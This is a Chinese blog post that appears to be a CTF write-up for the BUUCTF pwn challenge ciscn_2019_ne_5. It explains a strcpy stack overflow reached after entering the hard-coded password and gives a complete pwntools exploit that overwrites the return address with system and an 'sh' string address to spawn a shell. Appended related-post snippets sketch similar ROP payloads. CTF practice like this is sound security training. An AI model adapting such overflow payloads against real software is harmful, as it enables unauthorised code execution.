BUUCTF 刷题 ciscn_2019_ne_5

最新推荐文章于 2023-04-09 16:35:13 发布
最新推荐文章于 2023-04-09 16:35:13 发布
阅读量2.2k 收藏
点赞数 1
分类专栏: 笔记 文章标签: 安全 python 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Helloity/article/details/122866664
版权

先附上题目地址:BUUCTF在线评测

首当其冲checksec,开启了NX保护,32位程序。

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

还是蛮有意思的一道题,我的IDA有些问题,无法f5主函数,那么就看汇编。我先运行了一下题目,发现要我们输入一个密码,但是我们并不知道密码是什么。通过汇编发现密码是administrator。然后就是提示界面搞了0123四个选项,还有一个4选项可以运行getflag函数,这里有一个strcpy可以用来栈溢出。其中有system函数有puts,所以刚开始想的是没有/bin/sh的ret2libc。不过在我libcsearcher一番操作后发现打不通。于是在gdb里用find sh cis试了一下果然有sh的地址,只不过IDA里看不到。于是就是一个常规的栈溢出了。

from pwn import *
from LibcSearcher import *

def recvui():
    for i in range(5):
        r.recvline()
    r.recvuntil(':')

context(os = 'linux',arch = 'i386')
r = process('./cis')
#r = remote('node4.buuoj.cn','25598')
elf = ELF('./cis')

sh = 0x80482ea
system = 0x080484D0


r.recvuntil(':')
r.sendline('administrator')

recvui()
r.sendline('1')
r.recvuntil(':')
payload = 'a'*76+p32(system)+'bbbb'+p32(sh)
r.sendline(payload)

recvui()
r.sendline('4')

r.interactive()

这几天感觉做题越来越上道了,果然师傅说的基础还是有用,打好基础最重要了。 

Hello Sally
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
UEFITool_NE_A51_win32.zip
12-24
UEFITool_NE_A51_win32
[BUUCTF]PWN——ciscn_2019_ne_5
wuyvle的博客
02-09 159
放进Linux一看是32位 进入ida对main不能直接F5 先进入scanf函数编译,再编译main 我们发现这是一个菜单表,输入administrator后进入菜单,而且这里s1只给了48个大小,而可以输入100个字节,可以溢出 我们进菜单1看看 看看菜单3 找到system函数了,接下来找到system地址和/bin/sh的地址 from pwn import* r=remote("node3.buuoj.cn",29791) elf=ELF('ciscn_2019_ne_5') syste
BUUCTF pwn——ciscn_2019_ne_5
CNS-Enterprise BCC-1701-J
04-09 120
BUUCTF 做题练习
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 498
ciscn_2019_ne_5 BUUCTF
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1582
buuctf ciscn_2019_ne_5题目分析
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1397
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
世界地形地图,giff栅格类型的图层,可以在Arcgis或QGIS中打开
ATOS.rar_ATOS NE_Atos
09-19
熟习无线传感器开发ATOS平台的使用和开发自己的传感器应用程序基于nesC语言
test_eth.rar_EMAC PHY_MC9S12NE64
09-24
MC9S12NE64网络收发测试代码,使用了芯片的EMAC和内部PHY
ciscn-2019-ne-3
最新发布
11-08
附件
BUUCTF-pwn(3)
njh18790816639的博客
11-10 656
[HarekazeCTF2019]baby_rop 该题还是比较简单的,没有什么难点!先探测一波保护! 并且还发现了字符串! 然后我们就可以开始构造payload了! payload = b’a’*(0x10+0x8)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) jarvisoj_level2_x64 这道题目过于简单,所以就不再分析了,直接上脚本! from pwn import * context(log_level='debug',os='linu
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 233
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
ciscn_2019_ne_5
z1r0的博客
12-05 98
ciscn_2019_ne_5 查看保护 密码已经给了我们,直接上去然后就看见了三个选项,没有4,ida之后才看见了。 看一下add和getflag这两个函数 add这里的a1就是main中的src。 getflag中将src给copy到dest中,dest离ebp有0x48大小。而src离ebp有0xfc个大小,可以通过add写入rop的payload,然后让getflag来执行这个rop。这题可以正常的ret2libc也可以ret2text,这题的shell是/sh,一开始年朝着/bin/sh
BUUCTF-ciscn_2019_ne_51
Rt1Text的博客
10-09 202
根据文件名可知是other shellcode。
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 672
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 289
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1077
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUUCTFciscn_2019_ne_5 Write Up
古月浪子的博客
08-06 824
题目是一道32位程序,依旧是rop 仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节 程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='i386' context.log_level='deb...
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 780
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
ffmpeg AV_NE
08-25
我可以告诉你关于FFmpeg中的AV_NE的信息。然而,根据你提供的引用内容,我无法找到与AV_NE相关的具体信息。可能是因为这个词组没有在你提供的引用中出现。如果你能提供更多的上下文或者详细的问题,我将会很乐意帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello Sally

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值